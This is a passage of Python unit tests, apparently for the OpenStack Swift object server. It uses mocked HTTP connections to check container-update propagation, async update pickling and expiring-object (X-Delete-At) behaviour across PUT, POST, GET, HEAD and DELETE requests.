return lambda *args: FakeConn()
orig_http_connect = object_server.http_connect
try:
for status in (200, 299):
object_server.http_connect = fake_http_connect()
self.object_controller.node_timeout = 0.001
self.object_controller.async_update(
'PUT', 'a', 'c', 'o', '127.0.0.1:1234', 1, 'sdc1',
{'x-timestamp': '1', 'x-out': str(status)}, 'sda1',
policy)
async_dir = diskfile.get_async_dir(policy)
self.assertTrue(
os.path.exists(os.path.join(
self.testdir, 'sda1', async_dir, 'a83',
'06fbf0b514e5199dfc4e00f42eb5ea83-%s' %
utils.Timestamp(1).internal)))
finally:
object_server.http_connect = orig_http_connect
utils.HASH_PATH_PREFIX = _prefix
def test_container_update_no_async_update(self):
policy = random.choice(list(POLICIES))
given_args = []
def fake_async_update(*args):
given_args.extend(args)
self.object_controller.async_update = fake_async_update
req = Request.blank(
'/v1/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '1234',
'X-Backend-Storage-Policy-Index': int(policy)})
self.object_controller.container_update(
'PUT', 'a', 'c', 'o', req, {
'x-size': '0', 'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
'x-content-type': 'text/plain', 'x-timestamp': '1'},
'sda1', policy)
self.assertEqual(given_args, [])
def test_container_update_success(self):
container_updates = []
def capture_updates(ip, port, method, path, headers, *args, **kwargs):
container_updates.append((ip, port, method, path, headers))
req = Request.blank(
'/sda1/0/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '123',
'X-Container-Host': 'chost:cport',
'X-Container-Partition': 'cpartition',
'X-Container-Device': 'cdevice',
'Content-Type': 'text/plain'}, body='')
with mocked_http_conn(200, give_connect=capture_updates) as fake_conn:
with fake_spawn():
resp = req.get_response(self.object_controller)
self.assertRaises(StopIteration, fake_conn.code_iter.next)
self.assertEqual(resp.status_int, 201)
self.assertEqual(len(container_updates), 1)
ip, port, method, path, headers = container_updates[0]
self.assertEqual(ip, 'chost')
self.assertEqual(port, 'cport')
self.assertEqual(method, 'PUT')
self.assertEqual(path, '/cdevice/cpartition/a/c/o')
self.assertEqual(headers, HeaderKeyDict({
'user-agent': 'object-server %s' % os.getpid(),
'x-size': '0',
'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
'x-content-type': 'text/plain',
'x-timestamp': utils.Timestamp(1).internal,
'X-Backend-Storage-Policy-Index': '0', # default when not given
'x-trans-id': '123',
'referer': 'PUT http://localhost/sda1/0/a/c/o'}))
def test_PUT_container_update_overrides(self):
def do_test(override_headers):
container_updates = []
def capture_updates(
ip, port, method, path, headers, *args, **kwargs):
container_updates.append((ip, port, method, path, headers))
ts_put = next(self.ts)
headers = {
'X-Timestamp': ts_put.internal,
'X-Trans-Id': '123',
'X-Container-Host': 'chost:cport',
'X-Container-Partition': 'cpartition',
'X-Container-Device': 'cdevice',
'Content-Type': 'text/plain',
}
headers.update(override_headers)
req = Request.blank('/sda1/0/a/c/o', method='PUT',
headers=headers, body='')
with mocked_http_conn(
200, give_connect=capture_updates) as fake_conn:
with fake_spawn():
resp = req.get_response(self.object_controller)
self.assertRaises(StopIteration, fake_conn.code_iter.next)
self.assertEqual(resp.status_int, 201)
self.assertEqual(len(container_updates), 1)
ip, port, method, path, headers = container_updates[0]
self.assertEqual(ip, 'chost')
self.assertEqual(port, 'cport')
self.assertEqual(method, 'PUT')
self.assertEqual(path, '/cdevice/cpartition/a/c/o')
self.assertEqual(headers, HeaderKeyDict({
'user-agent': 'object-server %s' % os.getpid(),
'x-size': '0',
'x-etag': 'override_etag',
'x-content-type': 'override_val',
'x-timestamp': ts_put.internal,
'X-Backend-Storage-Policy-Index': '0', # default
'x-trans-id': '123',
'referer': 'PUT http://localhost/sda1/0/a/c/o',
'x-foo': 'bar'}))
# EC policy override headers
do_test({
'X-Backend-Container-Update-Override-Etag': 'override_etag',
'X-Backend-Container-Update-Override-Content-Type': 'override_val',
'X-Backend-Container-Update-Override-Foo': 'bar',
'X-Backend-Container-Ignored': 'ignored'})
# middleware override headers
do_test({
'X-Object-Sysmeta-Container-Update-Override-Etag': 'override_etag',
'X-Object-Sysmeta-Container-Update-Override-Content-Type':
'override_val',
'X-Object-Sysmeta-Container-Update-Override-Foo': 'bar',
'X-Object-Sysmeta-Ignored': 'ignored'})
# middleware override headers take precedence over EC policy headers
do_test({
'X-Object-Sysmeta-Container-Update-Override-Etag': 'override_etag',
'X-Object-Sysmeta-Container-Update-Override-Content-Type':
'override_val',
'X-Object-Sysmeta-Container-Update-Override-Foo': 'bar',
'X-Backend-Container-Update-Override-Etag': 'ignored',
'X-Backend-Container-Update-Override-Content-Type': 'ignored',
'X-Backend-Container-Update-Override-Foo': 'ignored'})
def test_container_update_async(self):
policy = random.choice(list(POLICIES))
req = Request.blank(
'/sda1/0/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '123',
'X-Container-Host': 'chost:cport',
'X-Container-Partition': 'cpartition',
'X-Container-Device': 'cdevice',
'Content-Type': 'text/plain',
'X-Object-Sysmeta-Ec-Frag-Index': 0,
'X-Backend-Storage-Policy-Index': int(policy)}, body='')
given_args = []
def fake_pickle_async_update(*args):
given_args[:] = args
diskfile_mgr = self.object_controller._diskfile_router[policy]
diskfile_mgr.pickle_async_update = fake_pickle_async_update
with mocked_http_conn(500) as fake_conn, fake_spawn():
resp = req.get_response(self.object_controller)
self.assertRaises(StopIteration, fake_conn.code_iter.next)
self.assertEqual(resp.status_int, 201)
self.assertEqual(len(given_args), 7)
(objdevice, account, container, obj, data, timestamp,
policy) = given_args
self.assertEqual(objdevice, 'sda1')
self.assertEqual(account, 'a')
self.assertEqual(container, 'c')
self.assertEqual(obj, 'o')
self.assertEqual(timestamp, utils.Timestamp(1).internal)
self.assertEqual(policy, policy)
self.assertEqual(data, {
'headers': HeaderKeyDict({
'X-Size': '0',
'User-Agent': 'object-server %s' % os.getpid(),
'X-Content-Type': 'text/plain',
'X-Timestamp': utils.Timestamp(1).internal,
'X-Trans-Id': '123',
'Referer': 'PUT http://localhost/sda1/0/a/c/o',
'X-Backend-Storage-Policy-Index': int(policy),
'X-Etag': 'd41d8cd98f00b204e9800998ecf8427e'}),
'obj': 'o',
'account': 'a',
'container': 'c',
'op': 'PUT'})
def test_container_update_as_greenthread(self):
greenthreads = []
saved_spawn_calls = []
called_async_update_args = []
def local_fake_spawn(func, *a, **kw):
saved_spawn_calls.append((func, a, kw))
return mock.MagicMock()
def local_fake_async_update(*a, **kw):
# just capture the args to see that we would have called
called_async_update_args.append([a, kw])
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '12345',
'Content-Type': 'application/burrito',
'Content-Length': '0',
'X-Backend-Storage-Policy-Index': 0,
'X-Container-Partition': '20',
'X-Container-Host': '1.2.3.4:5',
'X-Container-Device': 'sdb1'})
with mock.patch.object(object_server, 'spawn',
local_fake_spawn):
with mock.patch.object(self.object_controller,
'async_update',
local_fake_async_update):
resp = req.get_response(self.object_controller)
# check the response is completed and successful
self.assertEqual(resp.status_int, 201)
# check that async_update hasn't been called
self.assertFalse(len(called_async_update_args))
# now do the work in greenthreads
for func, a, kw in saved_spawn_calls:
gt = spawn(func, *a, **kw)
greenthreads.append(gt)
# wait for the greenthreads to finish
for gt in greenthreads:
gt.wait()
# check that the calls to async_update have happened
headers_out = {'X-Size': '0',
'X-Content-Type': 'application/burrito',
'X-Timestamp': '0000012345.00000',
'X-Trans-Id': '-',
'Referer': 'PUT http://localhost/sda1/p/a/c/o',
'X-Backend-Storage-Policy-Index': '0',
'X-Etag': 'd41d8cd98f00b204e9800998ecf8427e'}
expected = [('PUT', 'a', 'c', 'o', '1.2.3.4:5', '20', 'sdb1',
headers_out, 'sda1', POLICIES[0]),
{'logger_thread_locals': (None, None)}]
self.assertEqual(called_async_update_args, [expected])
def test_container_update_as_greenthread_with_timeout(self):
'''
give it one container to update (for only one greenthred)
fake the greenthred so it will raise a timeout
test that the right message is logged and the method returns None
'''
called_async_update_args = []
def local_fake_spawn(func, *a, **kw):
m = mock.MagicMock()
def wait_with_error():
raise Timeout()
m.wait = wait_with_error # because raise can't be in a lambda
return m
def local_fake_async_update(*a, **kw):
# just capture the args to see that we would have called
called_async_update_args.append([a, kw])
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': '12345',
'Content-Type': 'application/burrito',
'Content-Length': '0',
'X-Backend-Storage-Policy-Index': 0,
'X-Container-Partition': '20',
'X-Container-Host': '1.2.3.4:5',
'X-Container-Device': 'sdb1'})
with mock.patch.object(object_server, 'spawn',
local_fake_spawn):
with mock.patch.object(self.object_controller,
'container_update_timeout',
1.414213562):
resp = req.get_response(self.object_controller)
# check the response is completed and successful
self.assertEqual(resp.status_int, 201)
# check that the timeout was logged
expected_logged_error = "Container update timeout (1.4142s) " \
"waiting for [('1.2.3.4:5', 'sdb1')]"
self.assertTrue(
expected_logged_error in
self.object_controller.logger.get_lines_for_level('debug'))
def test_container_update_bad_args(self):
policy = random.choice(list(POLICIES))
given_args = []
def fake_async_update(*args):
given_args.extend(args)
req = Request.blank(
'/v1/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '123',
'X-Container-Host': 'chost,badhost',
'X-Container-Partition': 'cpartition',
'X-Container-Device': 'cdevice',
'X-Backend-Storage-Policy-Index': int(policy)})
with mock.patch.object(self.object_controller, 'async_update',
fake_async_update):
self.object_controller.container_update(
'PUT', 'a', 'c', 'o', req, {
'x-size': '0',
'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
'x-content-type': 'text/plain', 'x-timestamp': '1'},
'sda1', policy)
self.assertEqual(given_args, [])
errors = self.object_controller.logger.get_lines_for_level('error')
self.assertEqual(len(errors), 1)
msg = errors[0]
self.assertTrue('Container update failed' in msg)
self.assertTrue('different numbers of hosts and devices' in msg)
self.assertTrue('chost,badhost' in msg)
self.assertTrue('cdevice' in msg)
def test_delete_at_update_on_put(self):
# Test how delete_at_update works when issued a delete for old
# expiration info after a new put with no new expiration info.
policy = random.choice(list(POLICIES))
given_args = []
def fake_async_update(*args):
given_args.extend(args)
req = Request.blank(
'/v1/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '123',
'X-Backend-Storage-Policy-Index': int(policy)})
with mock.patch.object(self.object_controller, 'async_update',
fake_async_update):
self.object_controller.delete_at_update(
'DELETE', 2, 'a', 'c', 'o', req, 'sda1', policy)
self.assertEqual(
given_args, [
'DELETE', '.expiring_objects', '0000000000',
'0000000002-a/c/o', None, None, None,
HeaderKeyDict({
'X-Backend-Storage-Policy-Index': 0,
'x-timestamp': utils.Timestamp('1').internal,
'x-trans-id': '123',
'referer': 'PUT http://localhost/v1/a/c/o'}),
'sda1', policy])
def test_delete_at_negative(self):
# Test how delete_at_update works when issued a delete for old
# expiration info after a new put with no new expiration info.
# Test negative is reset to 0
policy = random.choice(list(POLICIES))
given_args = []
def fake_async_update(*args):
given_args.extend(args)
self.object_controller.async_update = fake_async_update
req = Request.blank(
'/v1/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '1234', 'X-Backend-Storage-Policy-Index':
int(policy)})
self.object_controller.delete_at_update(
'DELETE', -2, 'a', 'c', 'o', req, 'sda1', policy)
self.assertEqual(given_args, [
'DELETE', '.expiring_objects', '0000000000', '0000000000-a/c/o',
None, None, None,
HeaderKeyDict({
# the expiring objects account is always 0
'X-Backend-Storage-Policy-Index': 0,
'x-timestamp': utils.Timestamp('1').internal,
'x-trans-id': '1234',
'referer': 'PUT http://localhost/v1/a/c/o'}),
'sda1', policy])
def test_delete_at_cap(self):
# Test how delete_at_update works when issued a delete for old
# expiration info after a new put with no new expiration info.
# Test past cap is reset to cap
policy = random.choice(list(POLICIES))
given_args = []
def fake_async_update(*args):
given_args.extend(args)
self.object_controller.async_update = fake_async_update
req = Request.blank(
'/v1/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '1234',
'X-Backend-Storage-Policy-Index': int(policy)})
self.object_controller.delete_at_update(
'DELETE', 12345678901, 'a', 'c', 'o', req, 'sda1', policy)
expiring_obj_container = given_args.pop(2)
expected_exp_cont = utils.get_expirer_container(
utils.normalize_delete_at_timestamp(12345678901),
86400, 'a', 'c', 'o')
self.assertEqual(expiring_obj_container, expected_exp_cont)
self.assertEqual(given_args, [
'DELETE', '.expiring_objects', '9999999999-a/c/o',
None, None, None,
HeaderKeyDict({
'X-Backend-Storage-Policy-Index': 0,
'x-timestamp': utils.Timestamp('1').internal,
'x-trans-id': '1234',
'referer': 'PUT http://localhost/v1/a/c/o'}),
'sda1', policy])
def test_delete_at_update_put_with_info(self):
# Keep next test,
# test_delete_at_update_put_with_info_but_missing_container, in sync
# with this one but just missing the X-Delete-At-Container header.
policy = random.choice(list(POLICIES))
given_args = []
def fake_async_update(*args):
given_args.extend(args)
self.object_controller.async_update = fake_async_update
req = Request.blank(
'/v1/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '1234',
'X-Delete-At-Container': '0',
'X-Delete-At-Host': '127.0.0.1:1234',
'X-Delete-At-Partition': '3',
'X-Delete-At-Device': 'sdc1',
'X-Backend-Storage-Policy-Index': int(policy)})
self.object_controller.delete_at_update('PUT', 2, 'a', 'c', 'o',
req, 'sda1', policy)
self.assertEqual(
given_args, [
'PUT', '.expiring_objects', '0000000000', '0000000002-a/c/o',
'127.0.0.1:1234',
'3', 'sdc1', HeaderKeyDict({
# the .expiring_objects account is always policy-0
'X-Backend-Storage-Policy-Index': 0,
'x-size': '0',
'x-etag': 'd41d8cd98f00b204e9800998ecf8427e',
'x-content-type': 'text/plain',
'x-timestamp': utils.Timestamp('1').internal,
'x-trans-id': '1234',
'referer': 'PUT http://localhost/v1/a/c/o'}),
'sda1', policy])
def test_delete_at_update_put_with_info_but_missing_container(self):
# Same as previous test, test_delete_at_update_put_with_info, but just
# missing the X-Delete-At-Container header.
policy = random.choice(list(POLICIES))
given_args = []
def fake_async_update(*args):
given_args.extend(args)
self.object_controller.async_update = fake_async_update
self.object_controller.logger = self.logger
req = Request.blank(
'/v1/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '1234',
'X-Delete-At-Host': '127.0.0.1:1234',
'X-Delete-At-Partition': '3',
'X-Delete-At-Device': 'sdc1',
'X-Backend-Storage-Policy-Index': int(policy)})
self.object_controller.delete_at_update('PUT', 2, 'a', 'c', 'o',
req, 'sda1', policy)
self.assertEqual(
self.logger.get_lines_for_level('warning'),
['X-Delete-At-Container header must be specified for expiring '
'objects background PUT to work properly. Making best guess as '
'to the container name for now.'])
def test_delete_at_update_delete(self):
policy = random.choice(list(POLICIES))
given_args = []
def fake_async_update(*args):
given_args.extend(args)
self.object_controller.async_update = fake_async_update
req = Request.blank(
'/v1/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '1234',
'X-Backend-Storage-Policy-Index': int(policy)})
self.object_controller.delete_at_update('DELETE', 2, 'a', 'c', 'o',
req, 'sda1', policy)
self.assertEqual(
given_args, [
'DELETE', '.expiring_objects', '0000000000',
'0000000002-a/c/o', None, None,
None, HeaderKeyDict({
'X-Backend-Storage-Policy-Index': 0,
'x-timestamp': utils.Timestamp('1').internal,
'x-trans-id': '1234',
'referer': 'DELETE http://localhost/v1/a/c/o'}),
'sda1', policy])
def test_delete_backend_replication(self):
# If X-Backend-Replication: True delete_at_update should completely
# short-circuit.
policy = random.choice(list(POLICIES))
given_args = []
def fake_async_update(*args):
given_args.extend(args)
self.object_controller.async_update = fake_async_update
req = Request.blank(
'/v1/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': 1,
'X-Trans-Id': '1234',
'X-Backend-Replication': 'True',
'X-Backend-Storage-Policy-Index': int(policy)})
self.object_controller.delete_at_update(
'DELETE', -2, 'a', 'c', 'o', req, 'sda1', policy)
self.assertEqual(given_args, [])
def test_POST_calls_delete_at(self):
policy = random.choice(list(POLICIES))
given_args = []
def fake_delete_at_update(*args):
given_args.extend(args)
self.object_controller.delete_at_update = fake_delete_at_update
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '4',
'Content-Type': 'application/octet-stream',
'X-Backend-Storage-Policy-Index': int(policy),
'X-Object-Sysmeta-Ec-Frag-Index': 2})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
self.assertEqual(given_args, [])
sleep(.00001)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Type': 'application/x-test',
'X-Backend-Storage-Policy-Index': int(policy)})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
self.assertEqual(given_args, [])
sleep(.00001)
timestamp1 = normalize_timestamp(time())
delete_at_timestamp1 = str(int(time() + 1000))
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': timestamp1,
'Content-Type': 'application/x-test',
'X-Delete-At': delete_at_timestamp1,
'X-Backend-Storage-Policy-Index': int(policy)})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
self.assertEqual(
given_args, [
'PUT', int(delete_at_timestamp1), 'a', 'c', 'o',
given_args[5], 'sda1', policy])
while given_args:
given_args.pop()
sleep(.00001)
timestamp2 = normalize_timestamp(time())
delete_at_timestamp2 = str(int(time() + 2000))
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': timestamp2,
'Content-Type': 'application/x-test',
'X-Delete-At': delete_at_timestamp2,
'X-Backend-Storage-Policy-Index': int(policy)})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
self.assertEqual(
given_args, [
'PUT', int(delete_at_timestamp2), 'a', 'c', 'o',
given_args[5], 'sda1', policy,
'DELETE', int(delete_at_timestamp1), 'a', 'c', 'o',
given_args[5], 'sda1', policy])
def test_PUT_calls_delete_at(self):
policy = random.choice(list(POLICIES))
given_args = []
def fake_delete_at_update(*args):
given_args.extend(args)
self.object_controller.delete_at_update = fake_delete_at_update
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(time()),
'Content-Length': '4',
'Content-Type': 'application/octet-stream',
'X-Backend-Storage-Policy-Index': int(policy),
'X-Object-Sysmeta-Ec-Frag-Index': 4})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
self.assertEqual(given_args, [])
sleep(.00001)
timestamp1 = normalize_timestamp(time())
delete_at_timestamp1 = str(int(time() + 1000))
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp1,
'Content-Length': '4',
'Content-Type': 'application/octet-stream',
'X-Delete-At': delete_at_timestamp1,
'X-Backend-Storage-Policy-Index': int(policy),
'X-Object-Sysmeta-Ec-Frag-Index': 3})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
self.assertEqual(
given_args, [
'PUT', int(delete_at_timestamp1), 'a', 'c', 'o',
given_args[5], 'sda1', policy])
while given_args:
given_args.pop()
sleep(.00001)
timestamp2 = normalize_timestamp(time())
delete_at_timestamp2 = str(int(time() + 2000))
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': timestamp2,
'Content-Length': '4',
'Content-Type': 'application/octet-stream',
'X-Delete-At': delete_at_timestamp2,
'X-Backend-Storage-Policy-Index': int(policy),
'X-Object-Sysmeta-Ec-Frag-Index': 3})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
self.assertEqual(
given_args, [
'PUT', int(delete_at_timestamp2), 'a', 'c', 'o',
given_args[5], 'sda1', policy,
'DELETE', int(delete_at_timestamp1), 'a', 'c', 'o',
given_args[5], 'sda1', policy])
def test_GET_but_expired(self):
test_time = time() + 10000
delete_at_timestamp = int(test_time + 100)
delete_at_container = str(
delete_at_timestamp /
self.object_controller.expiring_objects_container_divisor *
self.object_controller.expiring_objects_container_divisor)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(test_time - 2000),
'X-Delete-At': str(delete_at_timestamp),
'X-Delete-At-Container': delete_at_container,
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'X-Timestamp': normalize_timestamp(test_time)})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
orig_time = object_server.time.time
try:
t = time()
object_server.time.time = lambda: t
delete_at_timestamp = int(t + 1)
delete_at_container = str(
delete_at_timestamp /
self.object_controller.expiring_objects_container_divisor *
self.object_controller.expiring_objects_container_divisor)
put_timestamp = normalize_timestamp(test_time - 1000)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': put_timestamp,
'X-Delete-At': str(delete_at_timestamp),
'X-Delete-At-Container': delete_at_container,
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'GET'},
headers={'X-Timestamp': normalize_timestamp(test_time)})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
finally:
object_server.time.time = orig_time
orig_time = object_server.time.time
try:
t = time() + 2
object_server.time.time = lambda: t
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'GET'},
headers={'X-Timestamp': normalize_timestamp(t)})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
self.assertEqual(resp.headers['X-Backend-Timestamp'],
utils.Timestamp(put_timestamp))
finally:
object_server.time.time = orig_time
def test_HEAD_but_expired(self):
test_time = time() + 10000
delete_at_timestamp = int(test_time + 100)
delete_at_container = str(
delete_at_timestamp /
self.object_controller.expiring_objects_container_divisor *
self.object_controller.expiring_objects_container_divisor)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(test_time - 2000),
'X-Delete-At': str(delete_at_timestamp),
'X-Delete-At-Container': delete_at_container,
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'X-Timestamp': normalize_timestamp(test_time)})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
orig_time = object_server.time.time
try:
t = time()
delete_at_timestamp = int(t + 1)
delete_at_container = str(
delete_at_timestamp /
self.object_controller.expiring_objects_container_divisor *
self.object_controller.expiring_objects_container_divisor)
object_server.time.time = lambda: t
put_timestamp = normalize_timestamp(test_time - 1000)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': put_timestamp,
'X-Delete-At': str(delete_at_timestamp),
'X-Delete-At-Container': delete_at_container,
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'X-Timestamp': normalize_timestamp(test_time)})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
finally:
object_server.time.time = orig_time
orig_time = object_server.time.time
try:
t = time() + 2
object_server.time.time = lambda: t
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'HEAD'},
headers={'X-Timestamp': normalize_timestamp(time())})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
self.assertEqual(resp.headers['X-Backend-Timestamp'],
utils.Timestamp(put_timestamp))
finally:
object_server.time.time = orig_time
def test_POST_but_expired(self):
test_time = time() + 10000
delete_at_timestamp = int(test_time + 100)
delete_at_container = str(
delete_at_timestamp /
self.object_controller.expiring_objects_container_divisor *
self.object_controller.expiring_objects_container_divisor)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(test_time - 2000),
'X-Delete-At': str(delete_at_timestamp),
'X-Delete-At-Container': delete_at_container,
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': normalize_timestamp(test_time - 1500)})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 202)
delete_at_timestamp = int(time() + 1)
delete_at_container = str(
delete_at_timestamp /
self.object_controller.expiring_objects_container_divisor *
self.object_controller.expiring_objects_container_divisor)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(test_time - 1000),
'X-Delete-At': str(delete_at_timestamp),
'X-Delete-At-Container': delete_at_container,
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
orig_time = object_server.time.time
try:
t = time() + 2
object_server.time.time = lambda: t
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'POST'},
headers={'X-Timestamp': normalize_timestamp(time())})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
finally:
object_server.time.time = orig_time
def test_DELETE_but_expired(self):
test_time = time() + 10000
delete_at_timestamp = int(test_time + 100)
delete_at_container = str(
delete_at_timestamp /
self.object_controller.expiring_objects_container_divisor *
self.object_controller.expiring_objects_container_divisor)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': normalize_timestamp(test_time - 2000),
'X-Delete-At': str(delete_at_timestamp),
'X-Delete-At-Container': delete_at_container,
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
orig_time = object_server.time.time
try:
t = test_time + 100
object_server.time.time = lambda: float(t)
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': normalize_timestamp(time())})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 404)
finally:
object_server.time.time = orig_time
def test_DELETE_if_delete_at_expired_still_deletes(self):
test_time = time() + 10
test_timestamp = normalize_timestamp(test_time)
delete_at_time = int(test_time + 10)
delete_at_timestamp = str(delete_at_time)
delete_at_container = str(
delete_at_time /
self.object_controller.expiring_objects_container_divisor *
self.object_controller.expiring_objects_container_divisor)
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'PUT'},
headers={'X-Timestamp': test_timestamp,
'X-Delete-At': delete_at_timestamp,
'X-Delete-At-Container': delete_at_container,
'Content-Length': '4',
'Content-Type': 'application/octet-stream'})
req.body = 'TEST'
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 201)
# sanity
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'X-Timestamp': test_timestamp})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 200)
self.assertEqual(resp.body, 'TEST')
objfile = os.path.join(
self.testdir, 'sda1',
storage_directory(diskfile.get_data_dir(POLICIES[0]), 'p',
hash_path('a', 'c', 'o')),
utils.Timestamp(test_timestamp).internal + '.data')
self.assertTrue(os.path.isfile(objfile))
# move time past expirery
with mock.patch('swift.obj.diskfile.time') as mock_time:
mock_time.time.return_value = test_time + 100
req = Request.blank(
'/sda1/p/a/c/o', environ={'REQUEST_METHOD': 'GET'},
headers={'X-Timestamp': test_timestamp})
resp = req.get_response(self.object_controller)
# request will 404
self.assertEqual(resp.status_int, 404)
# but file still exists
self.assertTrue(os.path.isfile(objfile))
# make the x-if-delete-at with some wrong bits
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': delete_at_timestamp,
'X-If-Delete-At': int(time() + 1)})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 412)
self.assertTrue(os.path.isfile(objfile))
# make the x-if-delete-at with all the right bits
req = Request.blank(
'/sda1/p/a/c/o',
environ={'REQUEST_METHOD': 'DELETE'},
headers={'X-Timestamp': delete_at_timestamp,
'X-If-Delete-At': delete_at_timestamp})
resp = req.get_response(self.object_controller)
self.assertEqual(resp.status_int, 204)
self.assertFalse(os.path.isfile(objfile))
# make the x-if-delete-at with all the right bits (again)
req = Request.blank(
'/sda1/p/a/c/o',
